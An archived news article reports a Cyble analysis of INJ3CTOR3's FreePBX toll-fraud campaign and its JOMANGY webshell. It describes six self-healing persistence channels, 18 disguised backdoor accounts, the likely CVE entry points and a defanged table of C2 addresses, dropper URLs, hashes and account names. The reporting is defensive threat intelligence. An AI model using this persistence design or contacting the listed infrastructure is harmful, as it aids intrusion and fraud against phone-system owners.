CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership May 23, 2026

Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems

Cybersecurity News Archived May 23, 2026 ✓ Full text saved

A hacker group known as INJ3CTOR3 has been running an active campaign against FreePBX systems, deploying a newly discovered PHP webshell called JOMANGY that uses six separate persistence layers to stay embedded on compromised servers. The campaign targets internet-exposed VoIP phone systems and routes calls through them at the victims’ expense, a scheme known as […] The post Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems appeared first on Cyber Security News

Full text archived locally
✦ AI Summary · Claude Sonnet


    HomeCyber Security News Hackers Use Six-Layer Persistence to Maintain Access on Compromised FreePBX Systems By Tushar Subhra Dutta May 22, 2026 A hacker group known as INJ3CTOR3 has been running an active campaign against FreePBX systems, deploying a newly discovered PHP webshell called JOMANGY that uses six separate persistence layers to stay embedded on compromised servers. The campaign targets internet-exposed VoIP phone systems and routes calls through them at the victims’ expense, a scheme known as toll fraud. With a target list of over 3,000 IP addresses, the operation is designed for mass automated exploitation. FreePBX is an open-source interface used by businesses to manage phone systems built on Asterisk software. These setups handle real carrier accounts with SIP trunks that can originate actual phone calls. For an attacker, gaining access means routing calls through premium-rate numbers they control and letting the victim’s carrier send the bill, with none of the overhead that comes with ransomware or data theft. Analysts at Cyble (CRIL) identified the campaign and published a detailed report shared with Cyber Security News. Researchers tied the operation to INJ3CTOR3 with high confidence, an actor that has targeted VoIP infrastructure for financial gain since at least 2019. Prior campaign generations were documented by Check Point Research in 2020, Palo Alto Unit 42 in 2022, and Fortinet in January 2026. Campaign Architecture (Source – Cyble) The Shadowserver Foundation tracked over 900 FreePBX hosts compromised during the January 2026 campaign wave. By May 2026, more than 700 of those systems remained infected despite five months of public disclosure. That number reflects how genuinely difficult these infections are to clear, even after the original entry point has been patched. Two vulnerabilities are the most likely entry points for the current campaign. CVE-2025-64328 is a post-authentication command injection flaw in the FreePBX filestore module, while CVE-2025-57819 is a pre-authentication SQL injection bug in the FreePBX Endpoint module. Both are patched in current FreePBX releases, though patching an already-infected host leaves the cron infrastructure running and the malware fully capable of re-establishing itself. Hackers Use Six-Layer Persistence to Maintain Access What sets this campaign apart is how its persistence was engineered. The six channels are not independent backups sitting in parallel. Each one can reconstruct every other channel, making the infection genuinely self-healing. Clearing five of the six still hands the attacker a recovery window measured in minutes. The first channel polls the attacker’s command-and-control server every one to three minutes via scheduled cron jobs, continuously re-downloading and re-executing the dropper. The second fires a re-infection payload on every root login and system reboot by injecting code into shell profile files. The third stores eight immutable crontab copies in hidden directories, protected by a file attribute that silently blocks deletion even by root, backed by two separate restore loops. JOMANGY Webshell Operator Panel (Source – Cyble) The fourth is a process watchdog that immediately re-downloads the dropper if the beacon processes disappear. The fifth plants webshell copies across more than twelve paths in the FreePBX web tree, many locked immutable, where a single authenticated request to any survivor rebuilds the full infection stack. The sixth is a PHP executor in the FreePBX high-availability module providing privileged command execution independently of all other channels. Eighteen Hidden Accounts and Near-Zero Detection The infection also quietly drops 18 backdoor accounts across three tiers. Nine carry full root-equivalent privileges, eight operate at the service account level, and one is injected into the FreePBX web panel database via MySQL. Account names like asterisk, freepbxuser, and spamfilter were deliberately chosen to blend into the legitimate account list administrators would expect to find. JOMANGY had no prior public documentation before this analysis and uses double-layer obfuscation combining base64 encoding and ROT13 to defeat automated scanners. At the time of research, the primary dropper had only four detections across 76 antivirus engines, while k.php and wr.php had zero. Anyone dealing with a confirmed infection is advised to rebuild from a clean baseline, as leaving even one channel active gives the attacker enough leverage to restore the entire infection stack within minutes. Indicators of Compromise (IoCs):- Type Indicator Description IP Address 45[.]95[.]147[.]178 Primary C2 server (AS49870 Alsycon B.V., Netherlands)  IP Address 45[.]234[.]176[.]202 Prior campaign C2 (January 2026 encystPHP campaign, Brazilian infrastructure)  IP Address 160[.]119[.]76[.]250 Scanner/reconnaissance node in same AS49870 allocation as primary C2  IP Address 169[.]150[.]218[.]33 Operator VPN IP embedded in wor.php ZenharR instance (Datapacket AS212238)  IP Address 169[.]150[.]218[.]37 Operator VPN IP embedded in wr.php ZenharR instance  IP Address 146[.]70[.]129[.]114 Earlier operator VPN IP embedded in early JOMANGY variant (M247 Europe SRL)  File Hash (MD5) b506fc82 Stage 1 Bash dropper (23,355 bytes); 4 detections across 76 AV engines  File Hash (MD5) 100259af Stage 2 k.php (~45KB Bash); zero VirusTotal detections at time of analysis  File Hash (MD5) 49abb105 Alternate k.php variant retrieved from VirusTotal (2026-04-29)  File Hash (MD5) d40180f7 Stage 3 wr.php (27KB Bash ZenharR dropper); zero VirusTotal detections  File Hash (MD5) 995e6304 wor.php (13KB Bash, parallel ZenharR dropper)  File Hash (MD5) 71d94479 Prior campaign (January 2026) encystPHP dropper  File Hash (SHA256 partial) 039d648b Early JOMANGY webshell variant; VT first seen 2026-04-07  File Hash (MD5) a8b65af6c142736ccf80420e44df240f zen.php; assessed as ZenharR payload integrity reference  File Hash (MD5) ec4ca4db5ec0b782e51224fa7082ac06 Live auth token served by ask.php and _md5.php on C2  File Hash (MD5) b92c65af386ed772972b43cab0d55a4a ZenharR auth hash embedded in wor.php instance  File Hash (MD5) bfcedbc1831779921a0ee2cfaee004f2 Auth hash in early JOMANGY variant (039d648b)  File Hash (MD5) cf710203400b8c466e6dfcafcf36a411 Third ZenharR hash observed by SANS ISC at /admin/modules/phones/ajax.php  File Hash (SHA1) 6ea9c6d2d932532a4cd44c7974fb1a0a87dbfcf9 SHA1 password hash for backdoor FreePBX web panel account “freepbxusers”  Watermark String trace_e1ebf9066a951be519a24140711839ea JOMANGY webshell watermark present in every deployed instance  Marker String bm2cjjnRXac1WW3KT7k6MKTR Unique marker from January 2026 encystPHP dropper; used as grep eviction target  URL hxxp://45[.]95[.]147[.]178/k.php Stage 2 dropper download URL (cron-polled every 1-3 minutes)  URL hxxp://45[.]95[.]147[.]178/z/wr.php Stage 3 ZenharR dropper download URL  URL hxxp://45[.]95[.]147[.]178/z/wor.php Parallel ZenharR dropper URL  URL hxxp://45[.]95[.]147[.]178/z/post/root.php Post-exploitation callback URL (root execution track)  URL hxxp://45[.]95[.]147[.]178/z/post/noroot.php Post-exploitation callback URL (non-root execution track)  File Name people2.txt C2-hosted IP inventory file containing 3,080 assessed target addresses  File Name license.php PHP executor written to /var/www/html/admin/modules/freepbx_ha/license.php  File Name tryRoot1.sh Embedded shell script that writes license.php and triggers FreePBX HA hooks  Backdoor Account newfpbx, newfpbxs, xhimax UID-0 OS backdoor accounts created via base64-obfuscated useradd commands  Backdoor Account centos, admin, support, issabel, sangoma, emo Additional UID-0 OS backdoor accounts created in plaintext by Stage 1  Backdoor Account sugarmaint, spamfilter, asteriskuser, supports, freepbxuser, supermaint, asterisk, hima Service-tier OS backdoor accounts sharing same MD5-crypt password hash  Backdoor Account freepbxusers FreePBX web panel admin account injected into MySQL ampusers table  Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM. Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google. Tags cyber security cyber security news Copy URL Linkedin Twitter ReddIt Telegram Tushar Subhra Dutta Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics. Trending News FBI Warns of Kali365 Attacking Microsoft 365 Users to Steal Logins and Bypass MFA The Gentlemen Ransomware Attacks Windows, Linux, NAS, BSD, and ESXi Attacks Android Malware Silently Subscribes Victims to Premium Services Without Consent ShinyHunters Claims Credit for Cyber-Attack on Online Learning Management System Critical Chrome Vulnerabilities Enable Remote Code Execution Attacks – Patch Now! Latest News Cyber Security News Ubiquiti Patches Critical UniFi OS Vulnerabilities Allowing Remote Privilege Escalation Cyber Security LiteSpeed cPanel Plugin 0-Day Exploited in the wild to Gain Server Root Access Cyber Security News CISA adds Langflow Origin Validation Flaw to Known Exploited Vulnerabilities Catalog Cyber Security News Deleted Google API Keys Continue Accessing Gemini, BigQuery, and Maps APIs Cyber Security News CISA Warns of Microsoft Defender 0-Day Vulnerabilities Exploited in Attacks
    💬 Team Notes
    Article Info
    Source
    Cybersecurity News
    Category
    ◇ Industry News & Leadership
    Published
    May 23, 2026
    Archived
    May 23, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗